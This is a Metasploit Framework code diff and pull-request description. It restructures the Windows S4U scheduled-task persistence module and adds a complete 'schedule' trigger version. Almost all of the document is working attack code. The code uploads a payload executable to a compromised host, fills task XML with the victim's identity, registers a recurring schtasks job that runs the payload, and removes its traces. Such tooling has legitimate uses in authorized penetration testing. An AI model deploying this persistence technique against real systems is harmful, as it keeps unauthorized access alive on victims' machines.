+      ut = vt['lpSystemTime'].unpack('v*')
+      t = ::Time.utc(ut[0], ut[1], ut[3], ut[4], ut[5])
+    rescue StandardError
+      print_error('Could not read system time from victim... Using your local time to determine expire date')
+      t = ::Time.now
+    end
+
+    # Create time object to add expire time to and create tag
+    t += (datastore['EXPIRE_TIME'] * 60)
+    date = t.strftime('%Y-%m-%d')
+    time = t.strftime('%H:%M:%S')
+    end_boundary = "<EndBoundary>#{date}T#{time}</EndBoundary>"
+    return end_boundary
+  end
+
+  ##############################################################
+  # Creates trigger XML for event based triggers and replaces
+  # the time trigger.
+  # Returns altered XML
+  def create_trigger_event_tags(log, line, xml)
+    # Fscked up XML syntax for windows event #{id} in #{log}, weird spacind
+    # used to maintain natural Windows spacing for XML export
+    temp_xml = "<EventTrigger>\n"
+    temp_xml << "      #{create_expire_tag}\n" unless datastore['EXPIRE_TIME'] == 0
+    temp_xml << "      <Enabled>true</Enabled>\n"
+    temp_xml << '      <Subscription>&lt;QueryList&gt;&lt;Query Id="0" '
+    temp_xml << "Path=\"#{log}\"&gt;&lt;Select Path=\"#{log}\"&gt;"
+    temp_xml << line
+    temp_xml << '&lt;/Select&gt;&lt;/Query&gt;&lt;/QueryList&gt;'
+    temp_xml << "</Subscription>\n"
+    temp_xml << '    </EventTrigger>'
+
+    xml = xml.gsub(%r{<TimeTrigger>.*</TimeTrigger>}m, temp_xml)
+    return xml
+  end
+
+  ##############################################################
+  # Takes the XML and a path and writes file to filesystem
+  # Returns boolean for success
+  def write_xml(xml, path, rexe_path)
+    if file? path
+      delete_file(rexe_path)
+      fail_with(Failure::Unknown, "File #{path} already exists... Exiting")
+    end
+    begin
+      write_file(path, xml)
+    rescue StandardError
+      delete_file(rexe_path)
+      fail_with(Failure::Unknown, "Issues writing XML to #{path}")
+    end
+    print_good("Successfully wrote XML file to #{path}")
+  end
+
+  ##############################################################
+  # Takes path and delete file
+  # Returns boolean for success
+  def delete_file(path)
+    rm_f(path)
+  rescue StandardError
+    print_warning("Could not delete file #{path}, delete manually")
+  end
+
+  ##############################################################
+  # Takes path and name for task and creates final task
+  # Returns boolean for success
+  def create_task(path, schname, rexe_path)
+    # create task using XML file on victim fs
+    create_task_response = cmd_exec("cmd /c \"schtasks /create /xml \"#{path}\" /tn \"#{schname}\"\"")
+    if create_task_response =~ /has successfully been created/
+      print_good("Persistence task #{schname} created successfully")
+
+      # Create to delete commands for exe and task
+      @clean_up_rc << "execute -f cmd.exe -a \"/c schtasks /delete /tn #{schname} /f\"\n"
+      @clean_up_rc << "rm \"#{rexe_path}\"\n"
+
+      # Delete XML from victim
+      delete_file(path)
+
+    elsif create_task_response =~ /ERROR: Cannot create a file when that file already exists/
+      # Clean up
+      delete_file(rexe_path)
+      delete_file(path)
+      error = 'The scheduled task name is already in use'
+      fail_with(Failure::Unknown, error)
+    else
+      error = 'Issues creating task using XML file schtasks'
+      vprint_error("Error: #{create_task_response}")
+      if (datastore['EVENT_LOG'] == 'Security') && (datastore['TRIGGER'] == 'Event')
+        print_warning('Security log can restricted by UAC, try a different trigger')
+      end
+      # Clean up
+      delete_file(rexe_path)
+      delete_file(path)
+      fail_with(Failure::Unknown, error)
+    end
+  end
+
+  def install_persistence
+    # Generate payload
+    payload = generate_payload_exe
+
+    # Generate remote executable name
+    rexename = generate_rexename
+
+    # Generate path names
+    xml_path, rexe_path = generate_paths(rexename)
+
+    # Upload REXE to victim fs
+    upload_rexe(rexe_path, payload)
+
+    # Create basic XML outline
+    xml = create_xml(rexe_path)
+
+    # Fix XML based on trigger
+    xml = add_xml_triggers(xml)
+
+    # Write XML to victim fs, if fail clean up
+    write_xml(xml, xml_path, rexe_path)
+
+    # Name task with Opt or give random name
+    schname = datastore['TASK_NAME'] || Rex::Text.rand_text_alpha(rand(6..13))
+
+    # Create task with modified XML
+    create_task(xml_path, schname, rexe_path)
+  end
+
+end

--- a/modules/exploits/windows/persistence/service_for_user/logon.rb
+++ b/modules/exploits/windows/persistence/service_for_user/logon.rb
@@ -45,6 +45,7 @@ class MetasploitModule < Msf::Exploit::Local
           [ 'URL', 'https://web.archive.org/web/20131103174249/https://www.pentestgeek.com/2013/02/11/scheduled-tasks-with-s4u-and-on-demand-persistence/' ],
           [ 'URL', 'https://web.archive.org/web/20250625082052/http://www.scriptjunkie.us/2013/01/running-code-from-a-non-elevated-account-at-any-time/' ],
           [ 'URL', 'https://web.archive.org/web/20131123075026/http://msdn.microsoft.com/en-us/magazine/cc188757.aspx' ],
+          ['ATT&CK', Mitre::Attack::Technique::T1546_EVENT_TRIGGERED_EXECUTION],
           ['ATT&CK', Mitre::Attack::Technique::T1053_005_SCHEDULED_TASK]
         ],
         'Notes' => {

--- a/modules/exploits/windows/persistence/service_for_user/schedule.rb
+++ b/modules/exploits/windows/persistence/service_for_user/schedule.rb
@@ -1,0 +1,288 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = ExcellentRanking
+
+  include Msf::Post::File
+  include Msf::Post::Windows::Priv
+  include Exploit::EXE
+  include Msf::Exploit::Local::Persistence
+  prepend Msf::Exploit::Remote::AutoCheck
+  # include Msf::Post::Windows::TaskScheduler # task scheduler doesn't have an XML create method
+  include Msf::Exploit::Deprecated
+  moved_from 'exploits/windows/local/s4u_persistence'
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Windows Service for User (S4U) Scheduled Task Persistence - Schedule Trigger',
+        'Description' => %q{
+          Creates a scheduled task that will run using service-for-user (S4U).
+          This allows the scheduled task to run even as an unprivileged user
+          that is not logged into the device. This will result in lower security
+          context, allowing access to local resources only. The module
+          requires 'Logon as a batch job' permissions (SeBatchLogonRight).
+
+          Creates a scheduled task to run the payload ever FREQUENCY minutes for
+          the duration of EXPIRE_TIME.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Thomas McCarthy "smilingraccoon" <smilingraccoon[at]gmail.com>', # original module
+          'Brandon McCann "zeknox" <bmccann[at]accuvant.com>', # original module
+          'h00die' # persistence updates
+        ],
+        'Platform' => 'win',
+        'SessionTypes' => [ 'meterpreter' ],
+        'Arch' => [ARCH_X64, ARCH_X86, ARCH_AARCH64],
+        'Targets' => [ [ 'Windows', {} ] ],
+        'DisclosureDate' => '2013-01-02', # Date of scriptjunkie's blog post
+        'DefaultTarget' => 0,
+        'References' => [
+          [ 'URL', 'https://web.archive.org/web/20131103174249/https://www.pentestgeek.com/2013/02/11/scheduled-tasks-with-s4u-and-on-demand-persistence/' ],
+          [ 'URL', 'https://web.archive.org/web/20250625082052/http://www.scriptjunkie.us/2013/01/running-code-from-a-non-elevated-account-at-any-time/' ],
+          [ 'URL', 'https://web.archive.org/web/20131123075026/http://msdn.microsoft.com/en-us/magazine/cc188757.aspx' ],
+          ['ATT&CK', Mitre::Attack::Technique::T1053_005_SCHEDULED_TASK]
+        ],
+        'Notes' => {
+          'Reliability' => [EVENT_DEPENDENT, REPEATABLE_SESSION],
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK, CONFIG_CHANGES]
+        }
+      )
+    )
+
+    register_options(
+      [
+        OptInt.new('FREQUENCY', [false, 'Frequency in minutes to execute', 60]),
+        OptInt.new('EXPIRE_TIME', [false, 'Number of minutes until trigger expires', 0]),
+        OptString.new('PAYLOAD_NAME', [false, 'Name of payload file to write. Random string as default.']),
+        OptString.new('TASK_NAME', [false, 'The name of task. Random string as default.' ]),
+      ]
+    )
+  end
+
+  def writable_dir
+    d = super
+    return session.sys.config.getenv(d) if d.start_with?('%')
+
+    d
+  end
+
+  def check
+    version = get_version_info
+    print_warning('Payloads in %TEMP% will only last until reboot, you want to choose elsewhere.') if datastore['WritableDir'].start_with?('%TEMP%') # check the original value
+    return CheckCode::Safe("#{writable_dir} doesn't exist") unless exists?(writable_dir)
+    return CheckCode::Safe('This module only works on Vista/2008 and above') unless version.build_number >= Msf::WindowsVersion::Vista_SP0
+
+    return CheckCode::Appears('Target is likely exploitable')
+  end
+
+  ##############################################################
+  # Generate name for payload
+  # Returns name
+  def generate_rexename
+    rexename = datastore['PAYLOAD_NAME'] || Rex::Text.rand_text_alpha(rand(6..13)) + '.exe'
+    rexename += '.exe' unless rexename.downcase.end_with?('.exe')
+    rexename
+  end
+
+  ##############################################################
+  # Generate Path for payload upload
+  # Returns path for XML and payload
+  def generate_paths(rexename)
+    # Generate a path to write payload and XML
+    path = writable_dir
+    xml_path = "#{path}\\#{Rex::Text.rand_text_alpha(rand(6..13))}.xml"
+    rexe_path = "#{path}\\#{rexename}"
+    return xml_path, rexe_path
+  end
+
+  ##############################################################
+  # Upload the executable payload
+  # Returns boolean for success
+  def upload_rexe(path, payload)
+    vprint_status("Uploading #{path}")
+
+    if file? path
+      fail_with(Failure::Unknown, "File #{path} already exists... Exiting")
+    end
+
+    begin
+      write_file(path, payload)
+    rescue StandardError
+      fail_with(Failure::Unknown, "Could not upload to #{path}")
+    end
+
+    print_good("Successfully Uploaded remote executable to #{path}")
+  end
+
+  ##############################################################
+  # Creates a scheduled task, exports as XML, deletes task
+  # Returns normal XML for generic task
+  def create_xml(rexe_path)
+    xml_path = File.join(Msf::Config.data_directory, 'exploits', 's4u_persistence.xml')
+    xml_file = File.new(xml_path, 'r')
+    xml = xml_file.read
+    xml_file.close
+
+    # Get local time, not system time from victim machine
+    begin
+      vt = client.railgun.kernel32.GetLocalTime(32)
+      ut = vt['lpSystemTime'].unpack('v*')
+      t = ::Time.utc(ut[0], ut[1], ut[3], ut[4], ut[5])
+    rescue StandardError
+      print_warning('Could not read system time from victim... Using your local time to determine creation date')
+      t = ::Time.now
+    end
+    date = t.strftime('%Y-%m-%d')
+    time = t.strftime('%H:%M:%S')
+
+    # Put in correct times
+    xml = xml.gsub(/DATEHERE/, "#{date}T#{time}")
+
+    domain, user = client.sys.config.getuid.split('\\')
+
+    # Put in user information
+    xml = xml.sub(/DOMAINHERE/, user)
+    xml = xml.sub(/USERHERE/, "#{domain}\\#{user}")
+
+    xml = xml.sub(/COMMANDHERE/, rexe_path)
+    return xml
+  end
+
+  ##############################################################
+  # Takes the XML, alters it based on trigger specified. Will also
+  # add in expiration tag if used.
+  # Returns the modified XML
+  def add_xml_triggers(xml)
+    # Change interval tag, insert into XML
+    minutes = datastore['FREQUENCY']
+    xml = xml.sub(/<Interval>.*?</, "<Interval>PT#{minutes}M<")
+
+    # Insert expire tag if not 0
+    unless datastore['EXPIRE_TIME'] == 0
+      # Generate expire tag
+      end_boundary = create_expire_tag
+      # Inject expire tag
+      insert = xml.index('</StartBoundary>')
+      xml.insert(insert + 16, "\n      #{end_boundary}")
+    end
+
+    xml
+  end
+
+  ##############################################################
+  # Creates end boundary tag which expires the trigger
+  # Returns XML for expire
+  def create_expire_tag
+    # Get local time, not system time from victim machine
+    begin
+      vt = client.railgun.kernel32.GetLocalTime(32)
+      ut = vt['lpSystemTime'].unpack('v*')
+      t = ::Time.utc(ut[0], ut[1], ut[3], ut[4], ut[5])
+    rescue StandardError
+      print_error('Could not read system time from victim... Using your local time to determine expire date')
+      t = ::Time.now
+    end
+
+    # Create time object to add expire time to and create tag
+    t += (datastore['EXPIRE_TIME'] * 60)
+    date = t.strftime('%Y-%m-%d')
+    time = t.strftime('%H:%M:%S')
+    end_boundary = "<EndBoundary>#{date}T#{time}</EndBoundary>"
+    return end_boundary
+  end
+
+  ##############################################################
+  # Takes the XML and a path and writes file to filesystem
+  # Returns boolean for success
+  def write_xml(xml, path, rexe_path)
+    if file? path
+      delete_file(rexe_path)
+      fail_with(Failure::Unknown, "File #{path} already exists... Exiting")
+    end
+    begin
+      write_file(path, xml)
+    rescue StandardError
+      delete_file(rexe_path)
+      fail_with(Failure::Unknown, "Issues writing XML to #{path}")
+    end
+    print_good("Successfully wrote XML file to #{path}")
+  end
+
+  ##############################################################
+  # Takes path and delete file
+  # Returns boolean for success
+  def delete_file(path)
+    rm_f(path)
+  rescue StandardError
+    print_warning("Could not delete file #{path}, delete manually")
+  end
+
+  ##############################################################
+  # Takes path and name for task and creates final task
+  # Returns boolean for success
+  def create_task(path, schname, rexe_path)
+    # create task using XML file on victim fs
+    create_task_response = cmd_exec("cmd /c \"schtasks /create /xml \"#{path}\" /tn \"#{schname}\"\"")
+    if create_task_response =~ /has successfully been created/
+      print_good("Persistence task #{schname} created successfully")
+
+      # Create to delete commands for exe and task
+      @clean_up_rc << "execute -f cmd.exe -a \"/c schtasks /delete /tn #{schname} /f\"\n"
+      @clean_up_rc << "rm \"#{rexe_path}\"\n"
+
+      # Delete XML from victim
+      delete_file(path)
+
+    elsif create_task_response =~ /ERROR: Cannot create a file when that file already exists/
+      # Clean up
+      delete_file(rexe_path)
+      delete_file(path)
+      error = 'The scheduled task name is already in use'
+      fail_with(Failure::Unknown, error)
+    else
+      error = 'Issues creating task using XML file schtasks'
+      vprint_error("Error: #{create_task_response}")
+      if (datastore['EVENT_LOG'] == 'Security') && (datastore['TRIGGER'] == 'Event')
+        print_warning('Security log can restricted by UAC, try a different trigger')
+      end
+      # Clean up
+      delete_file(rexe_path)
+      delete_file(path)
+      fail_with(Failure::Unknown, error)
+    end
+  end
+
+  def install_persistence
+    payload = generate_payload_exe
+    rexename = generate_rexename
+
+    # Generate path names
+    xml_path, rexe_path = generate_paths(rexename)
+
+    # Upload REXE to victim fs
+    upload_rexe(rexe_path, payload)
+
+    # Create basic XML outline
+    xml = create_xml(rexe_path)
+
+    # Fix XML based on trigger
+    xml = add_xml_triggers(xml)
+
+    # Write XML to victim fs, if fail clean up
+    write_xml(xml, xml_path, rexe_path)
+
+    # Name task with Opt or give random name
+    schname = datastore['TASK_NAME'] || Rex::Text.rand_text_alpha(rand(6..13))
+
+    # Create task with modified XML
+    create_task(xml_path, schname, rexe_path)
+  end
+
+end


### PR DESCRIPTION
Updates the windows s4u persistence to the new mixin. The original persistence worked in several different and very cool ways, and I felt it would be best to split them out instead of complicating the datastore based on which technique was chosen. Part of https://github.com/rapid7/metasploit-framework/issues/20374

## Verification

- [x] Start `msfconsole`
- [x] exploit the box somehow
- [x] `use exploit/windows/persistence/service_for_user/<select a module>`
- [x] `set SESSION <id>`
- [x] `exploit`
- [x] **Verify** persistence is created, and you get a new session after doing the trigger
- [x] **Verify** cleanup works
- [x] **Document** is updated and correct